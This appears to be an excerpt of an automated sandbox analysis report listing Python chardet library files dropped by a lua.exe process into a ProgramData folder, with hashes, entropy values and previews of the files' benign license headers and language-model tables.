Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\escsm.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10510
Entropy (8bit):	4.816326627010161
Encrypted:	false
SSDEEP:	192:Kt17u42Uiw4c0gE4999/M///eeeVe//97PPnxJRae99999M0f/9999g//////N/J:6u4v0FArwa1l
MD5:	9C3BAAFEFA516EA1EEFCB03593C8CB1D
SHA1:	B6AE3D309926B691E6E8BE5DF7E9EC7E22DDAF62
SHA-256:	46E5E580DBD32036AB9DDBE594D0A4E56641229742C50D2471DF4402EC5487CE
SHA-512:	FFA57445FC50ABE5B6ECDF8B5EFDD96A97D1C068E8140D36A2755D9095AEB11FD826848E4B54F6183E0B5775AE4B7A2074D997185A23B34CAEA5F4BF1C80A035
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\eucjpprober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3749
Entropy (8bit):	4.731931768516198
Encrypted:	false
SSDEEP:	96:Kt17u493gzxj6HtQyylEl+s/rRWTIIRpB:Kt17u493y56ie4z
MD5:	7FCBC25522B5FB00AD88D12E86022F16
SHA1:	F583D01EA725D06785A47BE5AA47A9586CB4E843
SHA-256:	883F09769D084918E08E254DEDFD1EF3119E409E46336A1E675740F276D2794C
SHA-512:	6C84F3B62F696C19CEC04CF795D7379D423B5B37FCCD3F94D5670AEE6361B424BF3B943B77E08C5DEF0296B4E1437501648F495437B2D38182DB9CA4AE1CD437
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\euckrfreq.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13546
Entropy (8bit):	4.072619899441131
Encrypted:	false
SSDEEP:	192:kt17u4FdvXtmWt5mYt8EkFiTPJ1CTgEdCJz0ZUnYP+smG1tBLC/lGMwxpppHg:8u4vfQgJ8EkYTPJ+dtZggIG5L8G5RpHg
MD5:	FC74D266C33CB05F1ECD53EC517EC462
SHA1:	F92F0B57596EC180FB1505D3B3B966F07D61DFAA
SHA-256:	FBB19D9AF8167B3E3E78EE12B97A5AEED0620E2E6F45743C5AF74503355A49FA
SHA-512:	4D3AA23B3F95EFE49A8F2201FFEA90154264BF545F70B96B8AB2F2481D74514244C82B076EB4C616962243EE40D2EBAD2BB66154FBDABCE0E739DBD3883A16AD
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\euckrprober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1748
Entropy (8bit):	4.9856800780876736
Encrypted:	false
SSDEEP:	24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HWRTmjrsBATsDaMK:Kx/1ef0uwyUjHSvojrsBc7MK
MD5:	35C9C358A1F2554B15382675B680CB38
SHA1:	17A570BA185BF5BAC0B670932D3EA74376E19F7B
SHA-256:	32A14C4D05F15B81DBCC8A59F652831C1DC637C48FE328877A74E67FC83F3F16
SHA-512:	341BA6EC350ED7212AA2E77DADE00297100CFFB9650871025E4B798B1522055CCD41BA1919AA577B6716AB4A4B8AFED806BCCE0E35D9B97FB2413385750CE853
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\euctwfreq.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	31621
Entropy (8bit):	3.8933123222030295
Encrypted:	false
SSDEEP:	768:8u4fWnmUAziXRa7ZLTQAg0ljyeZCN04skmj22bgBXrgb/QWA4Pcvx:8dAbheZIANZyV04s7XbgBXrgRPcJ
MD5:	F22F9B84302F594271169463DF2C2ADC
SHA1:	1FE6190636462E94488B056A56770C84D48F3370
SHA-256:	368D56C9DB853A00795484D403B3CBC82E6825137347231B07168A235975E8C0
SHA-512:	A1C424421B90AE8D889C20DF9C2B7402502C81BBFB2EBCA6482FE076FA6E9C99C4062618A1BB866AB58652EB13CEB3A16B21673B85E252A9B8B34E1766E0128A
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\euctwprober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1747
Entropy (8bit):	4.986618421486693
Encrypted:	false
SSDEEP:	24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HWRT8j8Afs/ba8Xy:Kx/1ef0uwyUjHSv640H8Xy
MD5:	BA6A1374A470177EC21C4E1528E23F5B
SHA1:	F6ECD5D34962A5B81B71BDC40B140D553A0C120E
SHA-256:	D77A7A10FE3245AC6A9CFE221EDC47389E91DB3C47AB5FE6F214D18F3559F797
SHA-512:	444E6AD68079ECC0AA10330638B1B8FA632BD111CB63DEF3BDA2673A69C0F1E77374342F7D7581EFF98221E320A36D1A65DE265F03E3FF009FE0DD4045C941CC
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\gb2312freq.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	20715
Entropy (8bit):	3.934954005362253
Encrypted:	false
SSDEEP:	384:8u4UnDMKZJsgZwUfIp3Gy/7IJaGDO4Pd6yFapYgEMke0eapNvVqr:8u4UDMwJhZwUfE3G3jDFapzEMOhVU
MD5:	855D0A3B3FE3F931EB7D4A3F77E9F349
SHA1:	BF8051DEF4AF0BF4B04AD3C997A64A356D2EFECB
SHA-256:	257F25B3078A2E69C2C2693C507110B0B824AFFACFFE411BBE2BC2E2A3CEAE57
SHA-512:	4EA7F01BB64244684BB1CB7BF92B24E6D45DF92B2B8957FFE8198BE569F5862B9666806F355599ED5CAE0CEB655797F90DD4569BAE210F89CDFB15509CBB4B9E
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\gb2312prober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1754
Entropy (8bit):	5.003388925716946
Encrypted:	false
SSDEEP:	24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HWRTl4VAQsfaonD:Kx/1ef0uwyUjHSvr4FXqD
MD5:	E9B4EABD5CDA31D434F10B7299B4B47E
SHA1:	BC2518F812EEF5713556D847B933230C00BB22D4
SHA-256:	806BC85A2F568438C4FB14171EF348CAB9CBBC46CC01883251267AE4751FCA5C
SHA-512:	07D13ED4B7830FA3FB96B9BB7BD0387B55D5AE4AA83809F04212B4F4F4E574B39017744A522F4AEDD6F1DA26ECDA1CF5F960E011DC677A1D13A670D23F0CCE8C
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\hebrewprober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13838
Entropy (8bit):	4.719327774455086
Encrypted:	false
SSDEEP:	192:Ppf7u4TcWpp0mOJBucQcy4z3lnTB3H19S/egaFTLDVQMfeuVnuK3Ho:Bu4TcWppLIyclnTB3H19SWhLkao
MD5:	EE487DF69E219E2AF034E50ED27F6E99
SHA1:	07093CA2075F52D3D07B399A52F4A7491928FB1C
SHA-256:	737499F8AEE1BF2CC663A251019C4983027FB144BD93459892F318D34601605A
SHA-512:	AEB7BAF2A418B535916ECDEA1A295A5303107A29FA7666C8E6130BC5E80C195A08CD17F5E83D4C9EBE40C0C7F77F8514DB7BE9D063D6D26C6F0E5AED198346D8
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Shy Shalom.# Portions created by the Initial Developer are Copyright (C) 2005.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\jisfreq.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	25777
Entropy (8bit):	3.937817597776383
Encrypted:	false
SSDEEP:	768:8u4e1Pw/tan6GGY/XTTd1SuqmsEn5nxo+1E:8FVanVGYf27E5nxov
MD5:	34BE526E85A890AF4C0C38DF38D56B71
SHA1:	12A38AC0C60C3F5A8756A9E03EE74A22C9B481C0
SHA-256:	BE9989BF606ED09F209CC5513C730579F4D1BE8FE16B59ABC8B8A0F0207080E8
SHA-512:	32C352C308F8956D8FC012C31C523937657F8CD86CC7A1DEE3C11E5770CB892138FD5DD810DD59AF8F1E7ADD6178B5CC06B085FC385BA6F8B3CA3035EE4759D3
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\jpcntx.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19643
Entropy (8bit):	3.752207229692923
Encrypted:	false
SSDEEP:	384:8u4uzUSmG2Z94gNDp94q0p+Ory6SrE/KWVB7DWGgIYe0OfpOHbOoQFI0j73x8QrN:8u4I
MD5:	09BDB0C4F23A05CFEEB4F498F8B19D96
SHA1:	B6332D34D3820C06E07EB31AB68A22B5365882AA
SHA-256:	3D894DA915104FC2CCDDC4F91661C63F48A2B1C1654D6103F763002EF06E9E0A
SHA-512:	F3393FF0BE901392F905B17B5E53EFBDDA5626DAE62A557F71EBA9C5078ED30D167C0D801D5DB93BA060AD58909B8A2916BCE700B982D7CBBC6A30C102CFA51B
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\langbulgarianmodel.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	105685
Entropy (8bit):	3.2280969632799597
Encrypted:	false
SSDEEP:	768:VWzg7jiE0QrPHa/mimSvsgMdA+TFxns0mDQIy7RfO3I8lVrzFWmNQZ5MuGSjiJxB:307
MD5:	DC8BFCBD96E48E1EEC871008B9DF4C41
SHA1:	AB01C692BAC446348C1B6E1AEB8C41C76460C6D4
SHA-256:	AFAB6F3AD3BC16A8676D6041E55E1CCDC9757D6338A41F651A259053EF20BECC
SHA-512:	7C2F368A330ED3A5053BAD05ED9D493445ED6FE5E33B99FE185BB8AB561AD1BA215DB2362F100344D76B19FFFD8B3E945263BE5B1DA6D39072AB5B1ABBB502E6
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..BULGARIAN_LANG_MODEL = {. 63: { # 'e'. 63: 1, # 'e'. 45: 0, # '\xad'. 31: 0, # '.'. 32: 0, # '.'. 35: 0, # '.'. 43: 0, # '.'. 37: 0, # '.'. 44: 0, # '.'. 55: 0, # '.'. 47: 0, # '.'. 40: 0, # '.'. 59: 0, # '.'. 33: 0, # '.'. 46: 0, # '.'. 38: 0, # '.'. 36: 0, # '.'. 41: 0, # '.'. 30: 0, # '.'. 39: 0, # '.'. 28: 0, # '.'. 34: 0, # '.'. 51: 0, # '.'. 48: 0, # '.'. 49: 0, # '.'. 53: 0, # '.'. 50: 0, # '.'. 54: 0, # '.'. 57: 0, # '.'. 61: 0, # '.'. 60: 0, # '.'. 56: 0, # '.'. 1: 0, # '.'. 18: 1, # '.'. 9: 1, # '.'. 20: 1,

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\langgreekmodel.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	99559
Entropy (8bit):	3.211527056560738
Encrypted:	false
SSDEEP:	768:Q2I3Miw2Aa0VG426bvLkhVcwciD+v+BfChi0Qf2nbO4WeGfjvecIxZcdXcAxDitm:kZp
MD5:	15AA944AF16F7BBBA2DCF664E22CE077
SHA1:	C59BC42593F0B922B73F7A0179403F203CEA46B1
SHA-256:	D5C32EDB05203C1F1B43645B5634782CDC020844E043E0F0A34120DBFB81D75B
SHA-512:	5D90AFFC16754CE7EDA7C13160B98DF1BE90E99D2721DB805AC7589AAC6F2BA91CB63FC76C1B60E2541BDFFFED765A7A0DBDA80382A78947C1B40FE96BBCDA7E
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..GREEK_LANG_MODEL = {. 60: { # 'e'. 60: 2, # 'e'. 55: 1, # 'o'. 58: 2, # 't'. 36: 1, # '.'. 61: 0, # '.'. 46: 0, # '.'. 54: 0, # '.'. 31: 0, # '.'. 51: 0, # '.'. 43: 0, # '.'. 41: 0, # '.'. 34: 0, # '.'. 40: 0, # '.'. 52: 0, # '.'. 47: 0, # '.'. 44: 0, # '.'. 53: 0, # '.'. 38: 0, # '.'. 49: 0, # '.'. 59: 0, # '.'. 39: 0, # '.'. 35: 0, # '.'. 48: 0, # '.'. 37: 0, # '.'. 33: 0, # '.'. 45: 0, # '.'. 56: 0, # '.'. 50: 1, # '.'. 57: 0, # '.'. 17: 0, # '.'. 18: 0, # '.'. 22: 0, # '.'. 15: 0, # '.'. 1: 0, # '.'. 29: 0, # '.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\langhebrewmodel.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	98764
Entropy (8bit):	3.1733435275076394
Encrypted:	false
SSDEEP:	3072:F+xq/jLobEVWpt/ntjhejcQxmmLcRBi0k91FPWTXpPBMA3WzcboML7DmHlCkXMlA:F+xq/jLobEVWpt/ntjhejcQxmmLcRBiD
MD5:	7BD1A4AB964AD4F763CB83C9E3AEE8A8
SHA1:	E072A2E9BC510374083C9CB9E3FE460D6A22B91F
SHA-256:	BAB3262471C85ED0B069602ACB5CC463FE129B0C0DCEDEF7D1B0CEB635F3463B
SHA-512:	55D6E3F28E8164BE1A1EC2C808378F5F033F1AB811D632B534D50CE513443F2FCC1AC4D9BDF4626859FF9692B2947523DF540A8A1A9618600CFDC63A35A803AF
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..HEBREW_LANG_MODEL = {. 50: { # 'a'. 50: 0, # 'a'. 60: 1, # 'c'. 61: 1, # 'd'. 42: 1, # 'e'. 53: 1, # 'i'. 56: 2, # 'l'. 54: 2, # 'n'. 49: 0, # 'o'. 51: 2, # 'r'. 43: 1, # 's'. 44: 2, # 't'. 63: 1, # 'u'. 34: 0, # '\xa0'. 55: 0, # '.'. 48: 0, # '.'. 39: 0, # '.'. 57: 0, # '.'. 30: 0, # '.'. 59: 0, # '.'. 41: 0, # '.'. 33: 0, # '.'. 37: 0, # '.'. 36: 0, # '.'. 31: 0, # '.'. 29: 0, # '.'. 35: 0, # '.'. 62: 0, # '.'. 28: 0, # '.'. 38: 0, # '.'. 45: 0, # '.'. 9: 0, # '.'. 8: 0, # '.'. 20: 0, # '.'. 16: 0, # '.'. 3: 1, # '.'.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\langhungarianmodel.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	102486
Entropy (8bit):	3.112000025853554
Encrypted:	false
SSDEEP:	768:F8Do+PPz8n9nkDCC6gbDibWAp30fbH4Fha9YCnP0azyUCx6+U08amh1NNEbSgmW+:FAT
MD5:	4ED0A68F3E35F1835176D355C9A0874A
SHA1:	3C0556AA1EF370A83F3F456BE839F315CC0ACB1E
SHA-256:	383022B2FA827DEB3C07815EC8CFCF83D1D8DD90E7132682893E01C72CE873AC
SHA-512:	03AA4C3571E0C275D8635736D900CF671AF4A5D529533CDAD61653BA0449F4C4233FA27B914C0F553E1A0F39AF401FBB8833C8D7B60F45A9A573BB82302D8694
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..HUNGARIAN_LANG_MODEL = {. 28: { # 'A'. 28: 0, # 'A'. 40: 1, # 'B'. 54: 1, # 'C'. 45: 2, # 'D'. 32: 1, # 'E'. 50: 1, # 'F'. 49: 2, # 'G'. 38: 1, # 'H'. 39: 2, # 'I'. 53: 1, # 'J'. 36: 2, # 'K'. 41: 2, # 'L'. 34: 1, # 'M'. 35: 2, # 'N'. 47: 1, # 'O'. 46: 2, # 'P'. 43: 2, # 'R'. 33: 2, # 'S'. 37: 2, # 'T'. 57: 1, # 'U'. 48: 1, # 'V'. 55: 1, # 'Y'. 52: 2, # 'Z'. 2: 0, # 'a'. 18: 1, # 'b'. 26: 1, # 'c'. 17: 2, # 'd'. 1: 1, # 'e'. 27: 1, # 'f'. 12: 1, # 'g'. 20: 1, # 'h'. 9: 1, # 'i'. 22: 1, # 'j'. 7: 2, # 'k'. 6: 2, # 'l'. 13: 2, # 'm'.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\langrussianmodel.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	131168
Entropy (8bit):	3.38395885481753
Encrypted:	false
SSDEEP:	768:J0RRnoENBU6imohUZm6Whzs8M3AwuiZLhOuaSVg3cNL9Y/UfG95Hlkbd2yZsRTvw:kk5bmhmRI3
MD5:	82770A8C9E90FF4EA6A510A763B048A0
SHA1:	FEC8F5FFD0CCE37D324A22985D2D27BE29B42E4D
SHA-256:	B0FAA4AC16D7D10570C32EA8A9197EC7B111BF6278FB368CA02BCBA644AC4892
SHA-512:	909BB037A07E8868776A1E51F35E60875F631A59824BBC735C0BC7A5120370710FC6ED0D32D30BE1BDD1C5342BABE62B5C64EAF31E81C88D04A4D5CA44270CFF
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..RUSSIAN_LANG_MODEL = {. 37: { # '.'. 37: 0, # '.'. 44: 1, # '.'. 33: 1, # '.'. 46: 1, # '.'. 41: 1, # '.'. 48: 1, # '.'. 56: 1, # '.'. 51: 1, # '.'. 42: 1, # '.'. 60: 1, # '.'. 36: 1, # '.'. 49: 1, # '.'. 38: 1, # '.'. 31: 2, # '.'. 34: 1, # '.'. 35: 1, # '.'. 45: 1, # '.'. 32: 1, # '.'. 40: 1, # '.'. 52: 1, # '.'. 53: 1, # '.'. 55: 1, # '.'. 58: 1, # '.'. 50: 1, # '.'. 57: 1, # '.'. 63: 1, # '.'. 62: 0, # '.'. 61: 0, # '.'. 47: 0, # '.'. 59: 1, # '.'. 43: 1, # '.'. 3: 1, # '.'. 21: 2, # '.'. 10: 2, # '.'. 19: 2,

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\langthaimodel.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	103300
Entropy (8bit):	3.251398022554534
Encrypted:	false
SSDEEP:	768:RO4yRslJrHAeANp4vS6g47Wbq0fMmRNndxvlS0rqXiME71+aMZ2ZIwMbdJ7Hh4At:Zf
MD5:	FBA3594136BBE9B5A77B29EA3A214F7B
SHA1:	66E0B9BD502D1A6F43C47F80A3A2C07DCEFB14E9
SHA-256:	A69A0A3862FD38F763F40E025321BC478F336E75EDF4C37559778261EA5AEAC7
SHA-512:	553337DA40E7EB5F61B0F7662F6E582D53C77BD59DC84CEC4F5648DA3FCA6AE3A02BD5D9FDDB76EC866B593EEB95A00A6B548C2D84D7D035D9EC08FCE07A353C
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..THAI_LANG_MODEL = {. 5: { # '.'. 5: 2, # '.'. 30: 2, # '.'. 24: 2, # '.'. 8: 2, # '.'. 26: 2, # '.'. 52: 0, # '.'. 34: 1, # '.'. 51: 1, # '.'. 47: 0, # '.'. 58: 3, # '.'. 57: 2, # '.'. 49: 0, # '.'. 53: 0, # '.'. 55: 0, # '.'. 43: 2, # '.'. 20: 2, # '.'. 19: 3, # '.'. 44: 0, # '.'. 14: 2, # '.'. 48: 0, # '.'. 3: 2, # '.'. 17: 1, # '.'. 25: 2, # '.'. 39: 1, # '.'. 62: 1, # '.'. 31: 1, # '.'. 54: 0, # '.'. 45: 1, # '.'. 9: 2, # '.'. 16: 1, # '.'. 2: 3, # '.'. 61: 2, # '.'. 15: 3, # '.'. 12:

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\langturkishmodel.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	95934
Entropy (8bit):	3.0460970701807786
Encrypted:	false
SSDEEP:	192:lsaLEatMa6ca66a7DSpuFbbY9VMJuXaa+a1HaZiiviPaDxiPNn+0iyKaA0i47aWR:TbU/4Ye0FbPIGwu3DDJa9XpTTu
MD5:	84E009A6C34C6ECAA39D96F48DD12365
SHA1:	0FB32965A1D35867F116A2212F827532A7E1A653
SHA-256:	1F795D89C23FAE196FD2BDD5169556B542FA5F7D16CB9F7ABFBFD81F3DAC11D8
